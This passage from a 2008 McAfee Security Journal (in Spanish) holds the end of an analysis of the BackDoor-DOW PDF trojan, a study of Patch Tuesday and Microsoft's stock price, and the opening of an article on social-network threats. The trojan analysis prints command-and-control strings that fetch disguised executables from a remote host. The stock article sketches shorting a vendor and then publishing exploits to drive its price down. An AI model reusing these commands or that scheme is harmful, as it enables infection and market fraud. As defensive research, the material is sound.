Figura 2: Este PDF malicioso transportaba una copia cifrada del malware BackDoor-DOW. Figura 4: El malware busca Acrobat Reader (AcroRd32.exe) y abre el archivo inocente book.pdf..
Figura 3: Versión descifrada de BackDoor-DOW.
OTOÑO 2008
19
Las tres secuencias de comandos del lado servidor, loginv2.asp, votev2.asp, y logoutv2.asp, informan al agresor de que dispone de una nueva máquina infectada, comprueban si el agresor ha enviado un comando y cierran la puerta trasera, respectivamente. Para leer la respuesta enviada tras conectarse a una de las secuencias de comandos del lado servidor, el troyano crea una copia de la página Web devuelta en la siguiente carpeta: C:\Archivos de programa\InstallShield Installation Information\ El nombre de archivo consta de un valor aleatorio de seis dígitos; una vez leído, el archivo se borra. loginv2.asp y logoutv2.asp sólo devuelven páginas Web vacías (con etiquetas ), pero votev2.asp devuelve código que más o menos significa “La puerta trasera está lista pero de momento no hace falta ninguna acción” (@n4@300@) o un comando como el siguiente: •
@n11@http://www1.palms[eliminado]/ld/v2/sy64. jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d 302f7a58aeb1@
•
@n11@http://www1.palms[eliminado]/ld/v2/200764.jpg @% SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94f fd48c@.
Aproximadamente, estos comandos quieren decir “Descargar el archivo de extensión .JPG mencionado e introducirlo en la carpeta %SysDir% del sistema de la víctima utilizando el nombre indicado del archivo ejecutable”. La última parte de la respuesta es el hash md5 del archivo que va a descargarse (y que servirá para comprobar su integridad). Durante todo este proceso, las víctimas no tienen ni idea de lo que está ocurriendo en segundo plano. Mientras leen y rellenan la declaración que ha presentado el archivo PDF malicioso, en su sistema se instala silenciosamente una puerta trasera a la espera de los comandos del atacante. En ese momento, en el equipo también pueden descargarse otros archivos maliciosos, ya que su seguridad se ha quebrantado por completo.
20
McAFEE SECURITY JOURNAL
Esta tendencia del malware puede extenderse en los próximos meses, lo cual es motivo de seria preocupación, porque la mayoría de la gente confía en los proveedores de seguridad. Si se pierde esta confianza, probablemente sufrirán todavía muchos usuarios más.
Software y sitios no autorizados Las interceptaciones imaginativas en ataques de ingeniería social no se limitan a acontecimientos deportivos. Durante varios meses hemos percibido un incremento del software malicioso que se presenta en forma de aplicaciones de proveedores de “seguridad”. Aparentando ser de ayuda, estos programas logran que las víctimas infecten su propio sistema. Algunas variantes del troyano FakeAlert7 advierten a sus víctimas de que su equipo está infectado (¿no les encanta la ironía?) y proporcionan información (a menudo URL maliciosas) para que se descarguen herramientas “antispyware”, que en realidad son también aplicaciones no autorizadas. Dada la importancia de mantener el software actualizado, no han tardado mucho en aparecer sitios Web de actualizaciones no autorizados imitando el sitio auténtico de Windows Update. Recientemente hemos descubierto un sofisticado método que utilizaba componentes DLL —vinculados a un sitio Windows Update falso— e impedía que Internet Explorer alertara a los usuarios cuando un servidor Web remoto empleaba un certificado no válido para un sitio Web seguro (HTTPS). El objetivo de este ataque era disfrazar los archivos maliciosos de verdaderas actualizaciones de Windows para que las víctimas las descargaran y ejecutaran. Esta tendencia del malware puede extenderse en los próximos meses, lo cual es motivo de seria preocupación, porque la mayoría de la gente confía en los proveedores de seguridad. Si se pierde esta confianza, probablemente sufrirán todavía muchos usuarios más.
Conclusión Los acontecimientos deportivos se utilizan con frecuencia como cebo en ataques de ingeniería social. Era fácil suponer que los desarrolladores de malware dirigirían su atención a los Juegos Olímpicos de Pekín. El acto contenía todos los ingredientes para una receta perfecta: pequeños ataques escogidos que crecían en alcance a medida que se elevaba el número de víctimas interesadas en el tema. Este crecimiento fue posible gracias a la estrecha relación de varios temas entre sí: la preocupación por el Tíbet dio paso al relevo de la antorcha, que a su vez desembocó en los propios Juegos Olímpicos. A menudo los medios de comunicación desempeñan un papel importante en la popularidad de un acontecimiento. Su trabajo induce a algunas víctimas a buscar más información, pero éstas tropiezan muchas veces con sitios Web relacionados pero maliciosos o, más habitualmente, con sitios Web legítimos que ya no son seguros y que infectan con sigilo a sus confiados visitantes.
Estos ataques son tan elaborados que lo más probable es que las víctimas no sospechen nada. Como hemos visto en este estudio, no sólo nos enfrentamos a amenazas de remitentes desconocidos y datos con extensión .exe adjuntos al correo electrónico. También los documentos legítimos (Microsoft Word, Microsoft Excel, Microsoft PowerPoint y otros) pueden ser malintencionados. En parte, estos ataques tienen tanto éxito por la ingenua creencia de que los archivos de datos no pueden contener malware. Al final, la gente acaba por conocer los trucos habituales, lo que a su vez obliga a los agresores a ser más creativos y malvados en sus técnicas para, así, seguir venciendo a sus víctimas.
Elodie Grandjean trabaja como investigadora de virus para McAfee Avert Labs en Francia desde enero de 2005. Posee más de cinco años de experiencia en ingeniería inversa con plataformas Windows. Elodie se ha especializado en técnicas de anti-ingeniería inversa, desempaquetado y descifrado, y ha escrito para la revista de seguridad francesa MISC: MultiSystem & Internet Security Cookbook. Si no está analizando malware o programando, seguramente Elodie está navegando por Internet, a menos que asista a un concierto o disfrute de una cerveza belga en un bar con sus amigos.
NOTAS 1 Fribet, McAfee VIL. http://vil.nai.com/vil/content/v_144356.htm 2 “Is Malware Writing the Next Olympic Event?” (Está el malware escribiendo el próximo acontecimiento olímpico) McAfee Avert Labs Blog. http://www.avertlabs.com/research/blog/index.php/2008/04/14/ is-malware-writing-the-next-olympic-event/ 3 “BackDoor-DOW,” McAfee VIL. http://vil.nai.com/vil/content/v_144476.htm 4 “Services”, Microsoft Developer Network. http://msdn.microsoft.com/en-us/library/ms685141(VS.85).aspx 5 “Registry”, Microsoft Developer Network. http://msdn.microsoft.com/en-us/library/ms724871(VS.85).aspx 6 “Descripción de Svchost.exe en Windows XP Professional Edition”, Microsoft Ayuda y soporte. http://support.microsoft.com/kb/314056/es
7 FakeAlert-B, McAfee VIL. http://vil.nai.com/vil/content/v_139058.htm FakeAlert-C. http://vil.nai.com/vil/content/v_139219.htm FakeAlert-D. http://vil.nai.com/vil/content/v_140346.htm FakeAlert-D!56c05f7f. http://vil.nai.com/vil/content/v_142850.htm FakeAlert-H. http://vil.nai.com/vil/content/v_141377.htm FakeAlert-I. http://vil.nai.com/vil/content/v_141466.htm FakeAlert-G. http://vil.nai.com/vil/content/v_141163.htm FakeAlert-M. http://vil.nai.com/vil/content/v_142807.htm FakeAlert-Q. http://vil.nai.com/vil/content/v_143088.htm FakeAlert-R. http://vil.nai.com/vil/content/v_143102.htm FakeAlert-S.dll. http://vil.nai.com/vil/content/v_143110.htm FakeAlert-T. http://vil.nai.com/vil/content/v_143406.htm Generic FakeAlert.a. http://vil.nai.com/vil/content/v_143470.htm
OTOÑO 2008
21
Vulnerabilidades en los mercados de valores Anthony Bettini
La reciente confusión crediticia en los mercados de valores y derivados ha puesto de relieve numerosas facetas de la industria financiera que no se limitan a las estructuras de control reglamentarias, agencias de calificación crediticia, fondos de inversión libre, inversiones en capital riesgo, fondos de pensiones y otros creadores de mercado. Esta atención continua por parte de los medios de comunicación ha hecho crecer el interés por la ingeniería financiera de las personas que trabajan en ciencias relacionadas (como bioinformática, informática, etc.). Con nuestro historial en investigación de vulnerabilidades y dado el contexto de repercusión en los medios de comunicación de la crisis crediticia, es natural buscar vulnerabilidades en el mercado de valores y derivados. En la conferencia sobre seguridad Black Hat 2007 que se celebra en Estados Unidos, la firma de investigación y desarrollo de seguridad Matasano Security examinaba el protocolo de intercambio de información financiera (Financial Information eXchange, FIX), que es el pilar para la transmisión de mensajes entre los directores de inversión encargados de numerosas operaciones en nombre de clientes e intermediarios financieros y agentes de bolsa1,2. En la investigación de Matasano se planteaban cuestiones como “¿Qué vulnerabilidades pueden encontrarse en el protocolo FIX?”. Sin duda fue un interesante análisis de los protocolos financieros desde la perspectiva de los puntos débiles de la seguridad. Sin embargo, nuestro artículo ofrecerá otro enfoque: a nosotros más que el aspecto de las vulnerabilidades nos preocupa la ingeniería financiera y social. Nuestra investigación comienza con las siguientes preguntas: •
¿Qué efectos tiene en las cotizaciones bursátiles el Martes de parches de Microsoft?
•
¿Y el día anterior al Martes de parches?
•
¿Y el día después (denominado en ocasiones "Miércoles de ataques")?
•
¿Y los Jueves de notificaciones avanzadas?
22
McAFEE SECURITY JOURNAL
•
¿Qué pasa con las amenazas de tipo zero-day?
•
¿Tienen siquiera constancia de estos eventos los inversores?
•
¿Se producen en la actualidad eventos de ingeniería social relacionados con las vulnerabilidades y las acciones? ¿Podríamos asistir un aumento de este tipo de eventos en el futuro?
Este es un tema de estudio muy amplio, así que comenzaremos por analizar solamente las vulnerabilidades de los productos de Microsoft. En el futuro cercano, esperamos aportar datos complementarios sobre otros desarrolladores de software, así como una comparativa del aspecto financiero de los métodos de distribución de parches (por ejemplo, la distribución mensual de Microsoft o la trimestral de Oracle, comparadas con la distribución no planificada de otros proveedores, que se ajusta según las necesidades de cada momento).
La hipótesis El Martes de parches es el segundo martes de cada mes. Es el único día del mes que Microsoft distribuye sobre todo actualizaciones de seguridad y funcionales para Windows y el resto de sus aplicaciones. Nuestra hipótesis es que los Martes de parches hay una tendencia a la baja del precio de las acciones de Microsoft (símbolo de cotización: MSFT). Esta presión se debe probablemente a las reacciones ante los artículos que aparecen sobre las implicaciones negativas de las vulnerabilidades de seguridad en el software de Microsoft. De manera análoga, al día siguiente, miércoles, es de esperar que se produzca una recuperación, una vez que los inversores se percaten de que los valores de Microsoft se sobrevendieron el día anterior.
¿Hay quien que gana dinero los Martes de parches? Parece ser que es así. Al menos parece evidente la relación entre las fluctuaciones del precio por acción de Microsoft y el ciclo de distribución de los Martes de parches. Por ejemplo, examinemos la Figura 1. La primera fila “Media anual” es la media base entre el precio por acción de Microsoft al inicio de la jornada y la cotización al cierre. Se incluye como alternativa base los “Días sin eventos”, que excluyen eventos como las notificaciones avanzadas y el Martes de parches. Por regla general, parece que cuando Microsoft publica una “Notificación avanzada” la cotización sufre una presión a la baja más fuerte de lo habitual. Del mismo modo, está presión a la baja también se observa los Martes de parches. Y lo que es aún más interesante es que los llamados Miércoles de ataques (día después del Martes de parches), como media, el valor experimenta una recuperación o un cierre neto positivo. Esto probablemente se deba a que los inversores institucionales El precio de las acciones de Microsoft cambia desde la apertura al cierre de la jornada bursátil. VARIACIÓN DE MSFT DE APERTURA A CIERRE
2008
2007
2006
Media anual
-0,17%
0,06%
0,08%
Días sin eventos
-0,20%
0,07%
Notificación avanzada
-0,43%
-0,12%
Martes de parches
-0,45%
-0,29%
-0,11%
Todos los martes
0,16%
0,05%
Martes, excepto los de parches
0,37%
Día después del Martes de parches
0,49%
Todos los miércoles Miércoles, excepto el día después del Martes de parches
o los creadores de mercado consideran que el día anterior la venta de acciones de Microsoft como consecuencia de las malas noticias fue excesiva y que, en realidad, el valor real de Microsoft como inversión sólo se vio afectado mínimamente. Es de destacar que esta tendencia ha sido constante durante los últimos tres años y continúa en la actualidad. Aunque posiblemente sea más fácil entender la variación del precio de la apertura al cierre, también pueden apreciarse las tendencias en la diferencia media entre el precio inicial y el precio máximo (cotización del día) y en la diferencia media entre el precio inicial y el precio mínimo, aunque, en algunos casos, este efecto no es tan acusado. En la Figura 2 observamos que generalmente el valor máximo intradía medio en un día de Notificación avanzada y un Martes de parches es inferior al valor máximo intradía medio del año. También observamos que el valor máximo intradía medio del día siguiente al Martes de parches suele ser superior, lo que indica mayores presiones al alza.
Valor mínimo intradía de Microsoft a la apertura
VARIACIÓN DE MSFT DE APERTURA A MÍN
2008
2007
2006
Media anual
-1,35%
-0,89%
-0,64%
0,08%
Días sin eventos
-1,39%
-0,90%
-0,64%
-0,08%
Notificación avanzada
-1,24%
-1,24%
-0,36%
Martes de parches
-1,58%
-0,99%
-0,93%
-0,03%
Todos los martes
-1,16%
-0,81%
-0,74%
0,15%
-0,01%
Martes, excepto los de parches
-1,01%
-0,76%
-0,68%
0,21%
0,27%
Día después del Martes de parches
-0,91%
-0,74%
-0,47%
-0,18%
0,44%
0,29%
Todos los miércoles
-1,39%
-0,78%
-0,51%
-0,40%
0,51%
0,26%
Miércoles, excepto el día después del Martes de parches
-1,56%
-0,79%
-0,54%
Figura 1: Si se analiza el cambio de las cotizaciones de Microsoft en días clave, se observará una tendencia constante durante tres años.
Figura 3: El Martes de parches conserva su posición "baja" cuando se compara con el mínimo medio intradía del año.
Valor máximo intradía de Microsoft a la apertura VARIACIÓN DE MSFT DE APERTURA A MÁX
2008
2007
2006
Media anual
1,28%
0,97%
0,88%
Días sin eventos
1,34%
0,95%
0,88%
Notificación avanzada
0,93%
1,08%
0,58%
Martes de parches
0,92%
0,98%
0,67%
Todos los martes
1,35%
1,01%
0,92%
Martes, excepto los de parches
1,50%
1,02%
0,99%
Día después del Martes de parches
1,52%
1,30%
0,70%
Todos los miércoles
1,25%
1,24%
0,92%
Miércoles, excepto el día después del Martes de parches
1,17%
1,23%
0,95%
Figura 2: En la contratación intradía en los días de Notificación avanzada y los Martes de parches la cotización es siempre inferior a la de los demás días del año. OTOÑO 2008
23
En la Figura 3 observamos que generalmente el valor mínimo intradía medio de un Martes de parches es inferior al valor mínimo intradía medio del año. Sin embargo, los días de Notificación avanzada, los resultados no están tan claros. Es también relevante que el valor mínimo intradía medio del día siguiente a un Martes de parches suele ser superior a la media del año, lo que indica mayores presiones al alza. Como advertencia para el inversor ocasional o para el inversor privado: estas fluctuaciones de precio son relativamente pequeñas y con estrechas limitaciones de tiempo. Para obtener beneficios a nivel privado en este tipo de operaciones sería necesario arriesgar mucho capital. Otra advertencia: los datos representados son reducidos y, por lo tanto, su calidad es relativamente limitada. Por ejemplo, sólo hay 260 días de mercado al año, de lo cuales sólo 12 caen en Martes de parches. Aunque los grupos de datos y las fluctuaciones son pequeñas, es posible que este nivel de correlación sólo sea interesante para los inversores institucionales y debe adaptarse convenientemente. Ahora vamos a examinar una comparativa de los márgenes de ganancias potenciales (Figura 4). Según muestra la Figura 4, si se compra cerca del mínimo intradía medio en un Martes de parches y se vende cerca del máximo intradía medio del día siguiente, se pueden conseguir pequeñas ganancias (hasta que esta operación se generaliza, lo que produce un amortiguamiento del efecto).
hacerlo los rumores de que existen algunos defectos críticos que ponen en riesgo a los consumidores. No perdamos de vista que la divulgación de vulnerabilidades falsas y los rumores ya son habituales en las listas de correo actuales, como Full Disclosure o en salas de chat IRC. Es posible que mediante la ingeniería social los eventos se pudieran orquestar con el fin de manipular el mercado y a sus participantes. Esto sin duda sería ilegal; pero cuando se trata de obtener ganancias, siempre hay alguien dispuesto a saltarse la ley. Además, como veremos más adelante, no todos los ataques emplean la ingeniería social. Algunos pueden incluso ser legales. Este tipo de situaciones, es decir, la posibilidad de predecir la tendencia del mercado a corto plazo para obtener ganancias, al menos según la hipótesis de los mercados eficientes (EMH, Efficient Market Hypothesis) y la hipótesis del paseo aleatorio (Random Walk Hypothesis), son poco probables y desde luego, si se producen, es poco probable que perduren en el tiempo3,4. Por lo tanto, avisamos a los lectores, como pensamos que deberían hacer todas las entidades financieras: “rentabilidades pasadas no necesariamente garantizan rentabilidades futuras”5.
Uso del volumen de negociación como indicador Otra de nuestras teorías era que el ciclo de Martes de parches había amortiguado el efecto de la mala prensa observada durante los días de distribución no planificada de boletines de seguridad (antes de mediados de octubre de 2003). Una rápida mirada al volumen de negociación corroboraría esta teoría. (Véase la Figura 5, en la página siguiente.)
El margen de ganancias que se muestra se centra en la divulgación de vulnerabilidades reales que se producen basándose en la presunción de que otras personas actuarán de una forma previsible. Sin embargo, al igual que los rumores de OPA hostil afectan al precio de las acciones, también podrían
Márgenes de ganancias potenciales
2007
2008
MÁRGENES
2006
Mínimo intradía
Máximo intradía
Mínimo intradía
Máximo intradía
Mínimo intradía
Máximo intradía
Año completo (mínimo intradía) respecto a año completo (máximo intradía)
-1,35%
1,28%
-0,89%
0,97%
-0,64%
0,88%
Martes de parches (mínimo intradía) respecto a Martes de parches (máximo intradía)
-1,58%
0,92%
-0,99%
0,98%
-0,93%
0,67%
Martes de parches (mínimo intradía) respecto al día después del Martes de parches (máximo intradía)
-1,58%
1,52%
-0,99%
1,30%
-0,93%
0,70%
24
McAFEE SECURITY JOURNAL
Figura 4: Puede parecer que con la adquisición de acciones un Martes de parches y la posterior venta al día siguiente se pueden obtener ganancias legítimas, pero esto sólo es cierto cuando se negocian grandes volúmenes y el nivel de riesgo es considerable.
Volúmenes de Microsoft, 2002– 03 2003
2002
Volumen medio, año completo (en acciones negociadas al día)
65.074.644
76.903.678
Volumen medio, año completo (sin eventos)
64.512.432
76.503.325
Volumen medio, día de boletines no planificados
70.017.743
78.796.255
Diferencia media en volumen
7,60%
2,46%
Diferencia media en volumen respecto a días sin eventos
8,53%
3,00%
DIFERENCIALES DE VOLUMEN DE MSFT (SIN PLANIFICAR)
Figura 5: Volumen de contratación de las acciones de Microsoft antes de pasar de los boletines no planificados a los Martes de parches.
Publicaciones el Martes de parches DIFERENCIALES DE VOLUMEN DE MSFT (CON PLANIFICACIÓN)
2008
2007
2006
2005
2004
Volumen medio, año completo
84.898.274
62.506.437
67.074.387
66.612.503
66.793.733
Volumen medio, año completo (sin eventos)
86.738.696
64.210.868
68.753.419
67.227.483
67.260.018
Volumen medio, Martes de parches
75.584.620
57.840.233
63.786.108
65.453.142
65.439.875
Volumen medio de los martes, excepto los de parches
79.818.571
59.305.574
64.967.877
69.691.473
66.471.610
Diferencia media de volumen de MSFT (Martes de parches comparado con año completo)
-10,97%
-7,47%
-4,90%
-1,74%
-2,03%
Diferencia media de volumen de MSFT (Martes de parches comparado con días sin eventos)
-12,86%
-9,92%
-7,22%
-2,64%
-2,71%
Volumen de ^IXIC medio, año completo
2.249.267.340 2.089.534.502 1.926.859.522 1.731.835.794 1.769.480.040
Volumen de ^IXIC medio, año completo (sin eventos)
2.271.900.270 2.094.466.552 1.935.854.692 1.732.949.769 1.768.463.981
Volumen de ^IXIC medio en Martes de parches 2.161.318.000 2.054.922.500 2.009.946.667 1.745.967.500 1.759.816.667 Volumen de ^IXIC medio de los martes, excepto los de parches
2.249.947.143 2.107.280.909 1.813.831.818 1.658.301.818 1.752.408.182
Diferencia media de volumen de ^IXIC (Martes de parches comparado con año completo)
-3,91%
-1,66%
4,31%
0,82%
-0,55%
Diferencia media de volumen de ^IXIC (Martes de parches comparado con días sin eventos)
-4,87%
-1,89%
3,83%
0,75%
-0,49%
Diferencia en MSFT entre Martes de parches y martes sin parches
-5,30%
-2,47%
-1,82%
-6,08%
-1,55%
Diferencia en ^IXIC entre Martes de parches y martes sin parches
-3,94%
-2,48%
10,81%
5,29%
0,42%
Figura 6: La institución del Martes de parches parece haber convencido a los operadores bursátiles de que no se pueden obtener ventajas exclusivamente de los eventos ocurridos en dicho día.
OTOÑO 2008
25
En la Figura 5 (página 25) observamos que el día de la publicación no planificada de un boletín en 2003 y 2002, el volumen medio de negociación superó el volumen medio del año, un 7,6 por ciento y un 2,46 por ciento de media, respectivamente. Si comparamos solamente los días en los que no hay ningún evento especial para obtener el volumen medio del año completo, esta cifra se eleva hasta el 8,53 por ciento y el 3 por ciento, respectivamente.
Es posible que ya haya quien utiliza las amenazas de tipo zero-day (día cero) para un beneficio económico, no sólo para incluir troyanos que roben contraseñas, sino para adoptar posiciones cortas o de opciones sobre acciones y derivados.
Esto contrasta bastante con los diferenciales de volumen de los Martes de parches, que se muestran en la Figura 6 (página 25). Hemos incluido también una comparativa entre Microsoft (MSFT) y el índice compuesto NASDAQ (^IXIC). Esto implicaría que el efecto de cambiar de boletines no planificados (paseo aleatorio) a planificados (Martes de parches) entre los operadores ha sido una disminución del interés por los eventos asociados al Martes de parches. A continuación, examinaremos los datos comparativos en el caso de las notificaciones avanzadas (véase la Figura 7, a continuación). ¿Por qué es el volumen medio inferior el Martes de parches y el día de Notificación avanzada? Nuestra hipótesis es que el volumen medio anual comparado con el volumen medio del Martes de parches puede explicarse debido a ”eventos significativos que afectan al año completo” (de la martingala en la teoría de la probabilidad) que estadísticamente tienen menos probabilidades de producirse un Martes de parches debido a que son menos frecuentes (sólo 12 veces al año)6.
Notas de prensa, reacciones e implicaciones Las implicaciones de estos factores pensamos que son interesantes y esperamos que este artículo estimule nuevas investigaciones sobre la influencia de las vulnerabilidades y las amenazas en los mercados de valores. Por ejemplo, pensemos en el bulo de Emulex7. En este caso, alguien publicó una nota de prensa falsa acerca del cese del Director Ejecutivo, que provocó una caída del 62 por ciento en la contratación intradía de acciones de Emulex. La persona responsable había vendido al descubierto una gran cantidad de acciones de la empresa y sus ganancias ascendieron a más de 250.000 dólares. Se trató de caso claro de fraude. Del mismo modo, se destapan de vez en cuando casos de contratación en bolsa con información privilegiada (que obviamente también es ilegal).
Notificación avanzada
2008
2007
2006
Volumen medio, año completo
84.898.274
62.506.437
67.074.387
Volumen medio, año completo (sin eventos)
86.738.696
64.210.868
68.753.419
Volumen medio, día de Notificación avanzada
82.848.700
61.532.042
54.484.850
Diferencia media en volumen
-2,41%
-1,56%
-18,77%
Diferencia media en volumen respecto a días sin eventos
-4,48%
-4,17%
-20,75%
DIFERENCIALES DE VOLUMEN DE MSFT (NOTIFICACIÓN AVANZADA)
Volumen de ^IXIC medio, año completo
2.249.267.340 2.089.534.502 1.926.859.522
Volumen de ^IXIC medio, año completo (sin eventos)
2.271.900.270 2.094.466.552 1.935.854.692
Volumen de ^IXIC medio, Notificación avanzada
2.221.380.000 2.224.365.833 1.872.442.500
26
McAFEE SECURITY JOURNAL
Figura 7: Como media, el volumen de negociación de los valores de Microsoft es menor en los Martes de parches y los días de Notificación avanzada.
Sin embargo, si las fluctuaciones del precio de las acciones se deben a los anuncios de vulnerabilidades y parches, ¿qué ocurriría si una persona adoptara una posición corta (descubierto) en una empresa de software importante y publicara unas cuantas vulnerabilidades con ataques en la lista de correo de Full Disclosure? ¿Quizás, algo similar a lo conocido como el "Mes de los errores de navegador", pero dirigido a un proveedor, en un solo día? Si esto ocurriera en horario de contratación y durante uno de los días con menor probabilidad de que otras noticias distrajeran a los inversores (como los martes o jueves), las presiones a la baja en el mercado de valores serían significativas a nivel de particulares. Además sería manifiestamente ilegal si las vulnerabilidades no fueran ciertas (libelo o fraude). Sin embargo, ¿sería ilegal si fueran ciertas? No está tan claro que decir la verdad, aunque sea de forma potencialmente manipuladora, pueda considerarse ingeniería social, ni siquiera que sea ilegal. Es posible que pudieran defenderse ambas posturas, pero consideremos la controversia entre Firestone y Ford por reventones de neumáticos8. Si en ese momento hubiera tenido un coche Ford, hubiera sufrido problemas de neumáticos y hubiera adoptado una posición corta con respecto al valor, ¿podría haberse considerado un acto ilegal? Sin duda. Si hubiera vendido al descubierto y se lo hubiera comunicado a Firestone, Ford u otros, ¿sería eso legal? Como ocurre con cualquier otro vector de ataque o vulnerabilidad, estar al tanto y divulgar la información con frecuencia mejoran la situación de seguridad de los que pueden resolver el problema. Si hablamos con franqueza de los puntos débiles, quizás podamos mejorar y supervisar el sistema de forma adecuada. Es posible que ya haya quien utiliza las amenazas de tipo zero-day (día cero) para obtener un beneficio económico, no sólo para incluir troyanos que roben contraseñas, sino para adoptar posiciones cortas o de opciones sobre acciones y derivados.
Conclusión Todavía queda mucho por hacer en el área de las implicaciones de las vulnerabilidades y amenazas en los mercados de valores y derivados. Nos hemos centrado principalmente en los mercados de valores. Los mercados de derivados suelen moverse en la misma dirección, pero la volatilidad es mayor. Siempre que exista un cierto nivel de confianza en la dirección de un movimiento, parece lógico que los operadores que publican las vulnerabilidades traten de ajustar el momento de publicación a las fechas de expiración de las opciones. Quiero dar las gracias a mis compañeros Craig Schmugar y Eugene Tsyrklevich por revisar este documento y los datos que incluye, así como por ofrecer sus puntos de vista. - A.B.
Anthony Bettini es miembro del equipo directivo de McAfee Avert Labs. Su especialidad es la detección de vulnerabilidades y la seguridad de Windows. Bettini ha sido ponente en la Conferencia Nacional sobre Seguridad de Sistemas Informáticos del Instituto Nacional de Normas y Tecnología (NIST, en sus siglas en inglés) en el área de Washington, D.C, sobre las técnicas antiseguimiento, así como para numerosas empresas Global 2000. Mientras trabajó en Foundstone, publicó nuevas vulnerabilidades descubiertas en Microsoft Windows, ISS Scanner, PGP, Symantec ESM y otras aplicaciones de uso generalizado. Bettini fue editor técnico de la edición Hacking Exposed, 5th (Los piratas informáticos se aprovechan) (McGraw-Hill).
Es evidente que los remitentes de spam han encontrado formas de aprovecharse de los mercados de valores: hemos recibido muchos mensajes de spam que ofrecen acciones de muy poco valor. NOTAS 1 Goldsmith, Dave y Jeremy Rauch; Matasano Security. “Hacking Capitalism” (Los piratas informáticos se aprovechan del capitalismo), Black Hat USA 2007. 2 de agosto de 2007. 2 “Financial Information eXchange” (Intercambio de información financiera), Wikipedia. 20 de abril de 2008. http://en.wikipedia.org/wiki/Financial_Information_eXchange 3 “Random walk hypothesis” (Teoría del paseo aleatorio), Wikipedia. 15 de mayo de 2008. http://en.wikipedia.org/wiki/Random_walk_hypothesis 4 “Efficient Market Hyp” (Hipótesis de la eficiencia de los mercados), Wikipedia. 15 de mayo de 2008. http://en.wikipedia.org/wiki/Efficient_market_hypothesis 5 “Past performance not indicative of future results”(Rentabilidades pasadas no garantizan rentabilidades futuras), CBOE. 22.05.08. http://www.cboe.com/micro/vix/faq.aspx 6 “Martingale (probability theory)” (Martingala (teoría de la probabilidad)), Wikipedia. 22 de mayo de 2008. http://en.wikipedia.org/wiki/Martingale_%28probability_theory%29 7 “Emulex Hoax” (El bulo de Emulex), Wikipedia. 20 de abril de 2008. http://en.wikipedia.org/wiki/Emulex_hoax 8 “Firestone and Ford tire controversy” (Controversia por reventones de neumáticos) Wikipedia. 20 de abril de 2008. http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy
otras referencias • “CBOE’s archive of historic VIX data, using newer algorithm for the preSeptember 22, 2003 algorithm switch” (Archivo de datos históricos del índice VIX, utilizando un algoritmo nuevo para el algoritmo previo del 22 de septiembre de 2003) 20 de abril de 2008. http://www.cboe.com/micro/vix/historical.aspx • Lo, Andrew W. “The Adaptive Markets Hypothesis: Market Efficiency from an Evolutionary Perspective” (La hipótesis de los mercados adaptables: eficacia de los mercados desde una perspectiva de evolución). Journal of Portfolio Management. • Indicadores financieros cortesía principalmente de Yahoo Finance. 15 de mayo de 2008. http://finance.yahoo.com • Otros indicadores financieros cortesía de Google Finance. 20 de abril de 2008. http://finance.google.com
OTOÑO 2008
27
El futuro de los sitios de redes sociales Craig Schmugar
En los últimos años, los nombres de los sitios de redes sociales —MySpace, Facebook y otros —han entrado a formar parte de la lengua de uso común. Aunque muchos creen que las redes sociales en Internet es un fenómeno relativamente nuevo, en realidad, sitios como Classmates.com y SixDegrees.com llevan funcionando más de una década. Sin embargo, lo cierto es que la explosión de crecimiento se ha producido en los últimos años. Así que, ¿qué es exactamente lo que convierte a un sitio en una “red social”? Básicamente, los sitios de redes sociales son aquellos que están formados por una comunidad online que permite a los usuarios compartir información, y hacer nuevos contactos o retomar las relaciones con los del pasado. La importancia de los sitios de redes sociales se basa en dos razones. En primer lugar, son el epítome de la Web 2.0, donde la red de usuarios es la plataforma y la comunidad es responsable del contenido. La plataforma crece gracias a las contribuciones de los usuarios, a través de aplicaciones que están a disposición de la comunidad. En segundo lugar, los sitios de redes sociales combinan elementos de canales de comunicación, como el correo electrónico, los paneles de mensajes, la mensajería instantánea y el chat, con vehículos de comunicación, como el audio, el vídeo y las publicaciones. En estas comunidades, los individuos con ideas afines pueden compartir información e intereses comunes, así como aportar sus opiniones y puntos de vista. Estos sitios pueden servir de plataformas de colaboración y, a medida que crece la base de usuarios, aumenta el valor de toda la red. Además, estas plataformas permiten seleccionar la audiencia de la publicidad para ser más directos y especializados que nunca; las empresas pueden centrar sus iniciativas de marketing en las personas que están verdaderamente interesadas. Los sitios de redes sociales contienen un almacén de información que se puede explorar y analizar con el fin de ampliar los perfiles de los usuarios y generar complejos diagramas y mapas de relaciones entre los usuarios, y entre los usuarios y sus intereses. La clave del éxito de todo sitio de red social es contar con una base de usuarios sólida y fiel. Friendster.com sabe bien de lo que estamos hablando. Friendster fue el precursor de MySpace y, en sus mejores momentos, el sitio de red social número uno indiscutible.
28
McAFEE SECURITY JOURNAL
Entonces, ¿qué fue lo que le ocurrió? Friendster fue una especie de éxito catastrófico. Cuando la base de usuarios comenzó a crecer de forma masiva y el contenido evolucionó (incluyendo hasta juegos), el servidor central no pudo mantener el ritmo. Los administradores del sitio se vieron obligados limitar el contenido que requería un gran ancho de banda, pero ni siquiera así consiguieron mejorar el rendimiento hasta niveles satisfactorios y la base de usuarios desertó. Además, Friendster intentó encajar la base de usuarios en su modelo predefinido de cómo debía utilizarse la red y quién debía participar. MySpace ofrecía una plataforma más robusta, no sólo por su mayor ancho de banda, sino además por el nivel de libertad del que disfrutaban los usuarios a la hora de crear, modificar y visualizar una variedad de contenidos más amplia. En cuanto corrió la voz entre los internautas de que MySpace era el nuevo Friendster, no pasó mucho tiempo antes de que la mayoría se cambiara de red. Esta primera batalla entre redes sociales permite extraer algunas conclusiones, entre ellas, que la plataforma ha de ser flexible, ampliable y con capacidad de evolución, y que la fidelización de sus usuarios es esencial. Estos principios están allanando el camino para los sitios de redes sociales del futuro.
Inseguridad social Una parte del triunfo de MySpace sobre Friendster se debe al hecho de que permitía a los usuarios un elevado nivel de personalización de sus perfiles. Sin embargo, esto abrió el camino para que los agresores insertaran código maligno y lanzaran convincentes ataques de phising directamente desde sus perfiles de MySpace. Por desgracia, semejante nivel de flexibilidad se presta al aprovechamiento de vulnerabilidades, que los menos escrupulosos no dudan en utilizar. En la pugna por la cuota de mercado y siempre intentando evitar ser el siguiente Friendster, muchos sitios de redes sociales no han prestado a la seguridad toda la atención que merece. Como consecuencia, los sitios de redes sociales han sido blanco de
ataques de phising, gusanos, vulnerabilidades, recopilación de datos, distribución de publicidad no autorizada, difamación y, por último, aunque por eso no menos importante, de spam.
